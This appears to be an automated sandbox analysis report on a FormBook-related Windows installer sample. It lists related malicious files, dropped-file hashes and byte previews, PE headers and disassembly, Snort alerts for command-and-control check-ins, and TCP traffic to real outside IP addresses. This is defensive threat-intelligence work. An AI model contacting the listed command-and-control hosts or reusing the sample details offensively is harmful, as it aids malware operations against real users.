                                                                        vbc.exeGet hashmaliciousBrowse
                                                                        • 195.201.179.80
                                                                        vgUgvbLjyI.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        Rechnung.docGet hashmaliciousBrowse
                                                                        • 46.4.51.158
                                                                        6IGbftBsBg.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        SecuriteInfo.com.W32.AIDetect.malware2.22480.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        Revised Invoice No CU 7035.exeGet hashmaliciousBrowse
                                                                        • 78.46.133.81
                                                                        ikoAImKWvI.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        V7UnYc7CCN.exeGet hashmaliciousBrowse
                                                                        • 88.99.66.31
                                                                        uTQdPoKj0h.exeGet hashmaliciousBrowse
                                                                        • 95.217.123.103
                                                                        uTQdPoKj0h.exeGet hashmaliciousBrowse
                                                                        • 95.217.123.103
                                                                        Updated SOA.xlsxGet hashmaliciousBrowse
                                                                        • 136.243.92.92
                                                                        SecuriteInfo.com.W32.AIDetect.malware1.16239.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        SecuriteInfo.com.W32.AIDetect.malware1.23167.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248
                                                                        receipt-xxxx.htmGet hashmaliciousBrowse
                                                                        • 88.99.136.47
                                                                        comprobante de pago bancario.exeGet hashmaliciousBrowse
                                                                        • 168.119.91.111
                                                                        April_2021_Purchase_Order_000000000000000000000000.pdf.exeGet hashmaliciousBrowse
                                                                        • 95.217.195.80
                                                                        PAY-INV-1007.exeGet hashmaliciousBrowse
                                                                        • 95.217.195.80
                                                                        40JHtWiswn.exeGet hashmaliciousBrowse
                                                                        • 195.201.225.248

                                                                        JA3 Fingerprints

                                                                        No context

                                                                        Dropped Files

                                                                        No context

                                                                        Created / dropped Files

                                                                        C:\Users\user\AppData\Local\Temp\e68h9be2heenoc
                                                                        Process:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):6661
                                                                        Entropy (8bit):7.9587705785959235
                                                                        Encrypted:false
                                                                        SSDEEP:192:zBZehDwnmMs0HO/tFfb1WE8w0OwBTV+XPm8s:fNnfuFl/p0OwBTVom8s
                                                                        MD5:2D216B1AFB13BF6A41DAB8212338927E
                                                                        SHA1:FBA979DAD34C5EDB59FF776EFBFD0A274D1CEB53
                                                                        SHA-256:377FA98648C4DFA9B8251520812F0B1BDB59EB5E3F8FD36C72E53582E64758AE
                                                                        SHA-512:6D9A3B28D85EDCF7A85544B4269CC06A39F38A40C00749181A7F08B15BC5C8F60AEB9E869280E578723D18E554CD7761962E74334DD8AE0976B4BFCE50200646
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: .z.RC....\.Z7*....UC`.....Kg..Z8....qnz.O0i.<....hM....E..%M...F...i.+..h|I..W^.....7.......!i<....8..{Sf ..e.a....=>7..O...O...m.R...Ri|..D.u...Iv.>&..#$.N....DfyzO.i.w+jX...ru.%q0.....05ot...|bbvc......X.y....2.....NGP.O....T|}.'w<.+D..@U*B..F.Q..1..]..'z....N`.......".......j.q.f...e"..N&.N.$~.V.En.*.vboR...G..L.m|.....B...r.`.z...X....@..7.......m...1iRS..+...o.......~w.6%@..$ 89........B.....7!.Y....k......W.....lf=/...{S=....S`of....L('>.D....i....2.ajk..]....K..;...t..Xo6.X@.~.Iz...../(]......."..Z-.D..1.R_,V_..._`6.....0%&O[..:x.&.....P..o.....|O.....!Lsr.,....G.|.. _.?H.*.i...3.s5.....L=>..G.}.*%..Q...g..kx..?...'iC.v..-...#$....&.B.,z&^....vu.o.............305.t.....>%,tO.k..>m.ix.<M.R..D..?..!..>|..}(....+..P}.I=.U-.D.P.0p.....,Xe.4.L.-...8...Etsb.pc.<O0P.;U..0I.....P.-nc.V.8.-&q.-.Zv.O.....A.....%J.......B .R.ls~=[.E..eK.!..{.=>z(v......[.q..u....A|c.^/(5N......0.e7$.2.!Y..F.\.R:..l..?.X......#.h.J".of};.V......t.......<G...../e...
                                                                        C:\Users\user\AppData\Local\Temp\nsmDEE3.tmp\9a5t.dll
                                                                        Process:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                        Category:dropped
                                                                        Size (bytes):5120
                                                                        Entropy (8bit):4.135806506364649
                                                                        Encrypted:false
                                                                        SSDEEP:48:StF53c72xDiPqABPvhCWv+POuD2xSOGa4zzBvoAXAdUMQ9BgKRuqS:epuoOrZGXHBgVueqx
                                                                        MD5:E5A5E61AD269D94AA1F74F929F76ADDC
                                                                        SHA1:41A4642319054581903776CD0FE5AC282EC6FC8A
                                                                        SHA-256:3E39C71277FD492F9E995A5913176BEBD8F78B9CFF306A9CE6E5C8DBA7600015
                                                                        SHA-512:81F2245B1C4C465ACFC6BA70A81BA840A04B65D87F7C88AC44CBE816E8BE546FD7B4A56D5A162DA5F4BC991436D95A0D0AB289856F1F3D2472C690EBDDA07FA9
                                                                        Malicious:true
                                                                        Antivirus:
                                                                        • Antivirus: ReversingLabs, Detection: 24%
                                                                        Reputation:low
                                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;T..hT..hT..h@..iG..hT..h{..h...iU..h...iU..h...hU..h...iU..hRichT..h................PE..L...$im`...........!......................... ...............................`............@......................... !..L...X".......@.......................P..p....!............................................... ...............................text............................... ..`.rdata..(.... ......................@..@.data........0......................@....rsrc........@......................@..@.reloc..p....P......................@..B................................................................................................................................................................................................................................................................................................................................................
                                                                        C:\Users\user\AppData\Local\Temp\o5ph6yxu2bx7
                                                                        Process:C:\Users\user\Desktop\LWlcpDjYIQ.exe
                                                                        File Type:data
                                                                        Category:dropped
                                                                        Size (bytes):164864
                                                                        Entropy (8bit):7.999102061329467
                                                                        Encrypted:true
                                                                        SSDEEP:3072:gbpNGMsacBTLPQ6XNxuq/L8It9Uv3oc78YYWiqf9N8OrOUGuVJLMizNupDn90u:gbjB8BXo6XN9QipQY2zu14iprz
                                                                        MD5:1561C77B8880F2D836E670BD0BBE4747
                                                                        SHA1:4F608974B29A20293AFDF48EFA952BC2A75BBCE6
                                                                        SHA-256:636ECB0968871D043AC47B9D27235810DFD4BE00A4FF3CDAED88E4C7EE93B77E
                                                                        SHA-512:80A28FBEE55D66FE74782F44A8224135FAD85C50383D7513C7752FEE9749E5F4FA2422A31D4CE40E7D60C8D53717B9FC4E4819250E53D29F2594734E6D02F78A
                                                                        Malicious:false
                                                                        Reputation:low
                                                                        Preview: 7..4.e.2..<....4V...{.pm._v&.;hlW.m..(...l..:<.`..+..+....!....~.=L|..q...j....Y[n.^..K..O..i._^.y...g..}...xR..O..m..=^.EN.ly..XYtK.4.A.4_..&:..y.*.'*e.\3JD-.oU.......w.....r'.....X.}..Z.k..V?...?...../Bn.....U.VH..< ...&..a..Pt...Pk$.00.N.V{.....)...HRK..hI..Y.mC......b.1....R..q3.B.'./..F1.#..|..B.H.eQ... ..J......Y..-.Ev...B...+H0qN...X.._...C.Z..*.|...Q..>[R.....>`=M.....'.o. T0.. .@..Pj.....V.PD...Lj.(g"..\bnt!...w......P..Y:{ ..\...WUY.....$..8.9A...0.nT.A0.z.....q).3nMvT..B.......D...6.....4...P.r...j@jU.a.".......rD...'.4...K.<L..Zd..a..t.....\...C.....&..H.K.l@.C. ..C_;o.=.>(...$.2C|..U.HN.B..H....8.d.....+W.|KQD^.. .[..F..CRx;.](.{~..l_..e1jx.>X.Ku.w.....^.y.........`.[..We3...{u.z4.b...p.K...;.7[..p...?./U......}s..A .].5......j.m.....`y-i.....'..a...z<..Xk....y..m.....?5...E[.8s.";...BO....!...S}..6^.<.47.......(..s.n].l.S2.Afr........_E.2&=P.9J.cw.=.._.8!..y..D.;.+....U..../B.-($..w Hi.o\.An...@.wY....d9. .........u.....|.x.

                                                                        Static File Info

                                                                        General

                                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                        Entropy (8bit):7.915095365643499
                                                                        TrID:
                                                                        • Win32 Executable (generic) a (10002005/4) 92.16%
                                                                        • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                                        • DOS Executable Generic (2002/1) 0.02%
                                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                        File name:LWlcpDjYIQ.exe
                                                                        File size:206058
                                                                        MD5:91523f8d438585534d9466432cc4665d
                                                                        SHA1:e34b69f0ded056eca7dd43b8f5be2edf7198c211
                                                                        SHA256:b5e3426a888ddb5751f9802093f1bd10ec696b2994bee03b99b7ba2b4f21a57d
                                                                        SHA512:e8035c994acd9e46738b87eae25248df1548f8782d7475b4e9d362b68362ce62962780e46be0e054b9645d1be4e1eea8c93096f8e90bcb179040b5014eeec77b
                                                                        SSDEEP:3072:NeYBCwqDxkJ0APVbpNGMsacBTLPQ6XNxuq/L8It9Uv3oc78YYWiqf9N8OrOUGuVf:NDIqbjB8BXo6XN9QipQY2zu14iprCP
                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........lJ...$...$...$./.{...$...%.9.$.".y...$.......$.f."...$.Rich..$.........................PE..L.....8E.................\.........

                                                                        File Icon

                                                                        Icon Hash:00828e8e8686b000

                                                                        Static PE Info

                                                                        General

                                                                        Entrypoint:0x403166
                                                                        Entrypoint Section:.text
                                                                        Digitally signed:false
                                                                        Imagebase:0x400000
                                                                        Subsystem:windows gui
                                                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                                                        DLL Characteristics:
                                                                        Time Stamp:0x4538CD1D [Fri Oct 20 13:20:29 2006 UTC]
                                                                        TLS Callbacks:
                                                                        CLR (.Net) Version:
                                                                        OS Version Major:4
                                                                        OS Version Minor:0
                                                                        File Version Major:4
                                                                        File Version Minor:0
                                                                        Subsystem Version Major:4
                                                                        Subsystem Version Minor:0
                                                                        Import Hash:18bc6fa81e19f21156316b1ae696ed6b

                                                                        Entrypoint Preview

                                                                        Instruction
                                                                        sub esp, 0000017Ch
                                                                        push ebx
                                                                        push ebp
                                                                        push esi
                                                                        xor esi, esi
                                                                        push edi
                                                                        mov dword ptr [esp+18h], esi
                                                                        mov ebp, 00409240h
                                                                        mov byte ptr [esp+10h], 00000020h
                                                                        call dword ptr [00407030h]
                                                                        push esi
                                                                        call dword ptr [00407270h]
                                                                        mov dword ptr [0042F4D0h], eax
                                                                        push esi
                                                                        lea eax, dword ptr [esp+30h]
                                                                        push 00000160h
                                                                        push eax
                                                                        push esi
                                                                        push 00429860h
                                                                        call dword ptr [00407158h]
                                                                        push 00409230h
                                                                        push 0042EC20h
                                                                        call 00007F3D4CBC89D8h
                                                                        mov ebx, 00436400h
                                                                        push ebx
                                                                        push 00000400h
                                                                        call dword ptr [004070B4h]
                                                                        call 00007F3D4CBC6119h
                                                                        test eax, eax
                                                                        jne 00007F3D4CBC61D6h
                                                                        push 000003FBh
                                                                        push ebx
                                                                        call dword ptr [004070B0h]
                                                                        push 00409228h
                                                                        push ebx
                                                                        call 00007F3D4CBC89C3h
                                                                        call 00007F3D4CBC60F9h
                                                                        test eax, eax
                                                                        je 00007F3D4CBC62F2h
                                                                        mov edi, 00435000h
                                                                        push edi
                                                                        call dword ptr [00407140h]
                                                                        call dword ptr [004070ACh]
                                                                        push eax
                                                                        push edi
                                                                        call 00007F3D4CBC8981h
                                                                        push 00000000h
                                                                        call dword ptr [00407108h]
                                                                        cmp byte ptr [00435000h], 00000022h
                                                                        mov dword ptr [0042F420h], eax
                                                                        mov eax, edi
                                                                        jne 00007F3D4CBC61BCh
                                                                        mov byte ptr [esp+10h], 00000022h
                                                                        mov eax, 00000001h

                                                                        Rich Headers

                                                                        Programming Language:
                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                        Data Directories

                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x74500xb4.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x380000x567.rsrc
                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x280.rdata
                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                        Sections

                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                        .text0x10000x5bfe0x5c00False0.677097486413data6.48704517882IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                        .rdata0x70000x11fe0x1200False0.465494791667data5.27785481266IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .data0x90000x264d40x400False0.6669921875data5.22478733059IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                        .ndata0x300000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                        .rsrc0x380000x5670x600False0.432942708333data3.95240646825IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                        Resources

                                                                        NameRVASizeTypeLanguageCountry
                                                                        RT_DIALOG0x381000x100dataEnglishUnited States
                                                                        RT_DIALOG0x382000x11cdataEnglishUnited States
                                                                        RT_DIALOG0x3831c0x60dataEnglishUnited States
                                                                        RT_MANIFEST0x3837c0x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                        Imports

                                                                        DLLImport
                                                                        KERNEL32.dllCloseHandle, SetFileTime, CompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetFileSize, GetModuleFileNameA, GetTickCount, GetCurrentProcess, lstrcmpiA, ExitProcess, GetCommandLineA, GetWindowsDirectoryA, GetTempPathA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, lstrcmpA, GetEnvironmentVariableA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, SetErrorMode, GetModuleHandleA, LoadLibraryA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, CopyFileA
                                                                        USER32.dllScreenToClient, GetWindowRect, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, EndDialog, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxA, CharPrevA, DispatchMessageA, PeekMessageA, CreateDialogParamA, DestroyWindow, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, TrackPopupMenu, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                        SHELL32.dllSHGetMalloc, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                        ole32.dllOleInitialize, OleUninitialize, CoCreateInstance
                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                        Possible Origin

                                                                        Language of compilation systemCountry where language is spokenMap
                                                                        EnglishUnited States

                                                                        Network Behavior

                                                                        Snort IDS Alerts

                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                        04/08/21-13:01:04.899665TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.3118.27.122.19
                                                                        04/08/21-13:01:04.899665TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.3118.27.122.19
                                                                        04/08/21-13:01:04.899665TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972280192.168.2.3118.27.122.19
                                                                        04/08/21-13:01:10.374290TCP1201ATTACK-RESPONSES 403 Forbidden804972434.102.136.180192.168.2.3
                                                                        04/08/21-13:01:26.191338TCP2031453ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3184.168.131.241
                                                                        04/08/21-13:01:26.191338TCP2031449ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3184.168.131.241
                                                                        04/08/21-13:01:26.191338TCP2031412ET TROJAN FormBook CnC Checkin (GET)4972780192.168.2.3184.168.131.241
                                                                        04/08/21-13:01:32.580771TCP2031453ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3108.186.210.142
                                                                        04/08/21-13:01:32.580771TCP2031449ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3108.186.210.142
                                                                        04/08/21-13:01:32.580771TCP2031412ET TROJAN FormBook CnC Checkin (GET)4973180192.168.2.3108.186.210.142
                                                                        04/08/21-13:02:09.276811TCP1201ATTACK-RESPONSES 403 Forbidden804974134.102.136.180192.168.2.3
                                                                        04/08/21-13:02:14.417071TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.35.101.152.161
                                                                        04/08/21-13:02:14.417071TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.35.101.152.161
                                                                        04/08/21-13:02:14.417071TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974380192.168.2.35.101.152.161
                                                                        04/08/21-13:02:19.779296TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3208.91.197.27
                                                                        04/08/21-13:02:19.779296TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3208.91.197.27
                                                                        04/08/21-13:02:19.779296TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974480192.168.2.3208.91.197.27

                                                                        Network Port Distribution

                                                                        TCP Packets

                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                        Apr 8, 2021 13:00:59.204536915 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.239547014 CEST8049720160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:00:59.240991116 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.241127968 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.275954008 CEST8049720160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:00:59.276145935 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.276227951 CEST4972080192.168.2.3160.153.136.3
                                                                        Apr 8, 2021 13:00:59.310851097 CEST8049720160.153.136.3192.168.2.3
                                                                        Apr 8, 2021 13:01:04.661916971 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:04.899348021 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:04.899486065 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:04.899665117 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:05.137077093 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137732983 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137748957 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:05.137917042 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:05.137944937 CEST4972280192.168.2.3118.27.122.19
                                                                        Apr 8, 2021 13:01:05.375267982 CEST8049722118.27.122.19192.168.2.3
                                                                        Apr 8, 2021 13:01:10.183053017 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.195523024 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.195626020 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.195719004 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.207926989 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374289989 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374326944 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:10.374542952 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.374589920 CEST4972480192.168.2.334.102.136.180
                                                                        Apr 8, 2021 13:01:10.388279915 CEST804972434.102.136.180192.168.2.3
                                                                        Apr 8, 2021 13:01:15.434912920 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.577671051 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.579060078 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.579214096 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.721441984 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762191057 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762228012 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762248039 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762270927 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762432098 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762463093 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762511015 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762526035 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762551069 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762573004 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762582064 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762597084 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762617111 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.762639999 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762687922 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.762696028 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904820919 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904866934 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904892921 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904908895 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904916048 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904937983 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904944897 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904959917 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.904979944 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.904983044 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905005932 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.905006886 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905023098 CEST8049725198.185.159.144192.168.2.3
                                                                        Apr 8, 2021 13:01:15.905033112 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.905061007 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:15.906517982 CEST4972580192.168.2.3198.185.159.144
                                                                        Apr 8, 2021 13:01:26.013341904 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:26.190424919 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.190937042 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:26.191338062 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:26.368308067 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698020935 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698050976 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:26.698246956 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:27.183474064 CEST4972780192.168.2.3184.168.131.241
                                                                        Apr 8, 2021 13:01:27.360460997 CEST8049727184.168.131.241192.168.2.3
                                                                        Apr 8, 2021 13:01:32.423384905 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.580420017 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.580596924 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.580770969 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.737576008 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746746063 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746777058 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:32.746973038 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.747020960 CEST4973180192.168.2.3108.186.210.142
                                                                        Apr 8, 2021 13:01:32.906862974 CEST8049731108.186.210.142192.168.2.3
                                                                        Apr 8, 2021 13:01:37.916631937 CEST4973780192.168.2.3144.76.207.76
                                                                        Apr 8, 2021 13:01:37.939114094 CEST8049737144.76.207.76192.168.2.3
                                                                        Apr 8, 2021 13:01:37.939207077 CEST4973780192.168.2.3144.76.207.76
                                                                        Apr 8, 2021 13:01:37.939346075 CEST4973780192.168.2.3144.76.207.76
                                                                        Apr 8, 2021 13:01:37.961708069 CEST8049737144.76.207.76192.168.2.3
                                                                        Apr 8, 2021 13:01:37.961738110 CEST8049737144.76.207.76192.168.2.3
                                                                        Apr 8, 2021 13:01:43.103451967 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.214458942 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.214612961 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.214939117 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.325964928 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326561928 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326596022 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326626062 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326647043 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.326730013 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.326808929 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.326971054 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.327739000 CEST8049738199.59.242.153192.168.2.3
                                                                        Apr 8, 2021 13:01:43.327850103 CEST4973880192.168.2.3199.59.242.153
                                                                        Apr 8, 2021 13:01:43.438122988 CEST8049738199.59.242.153192.168.2.3
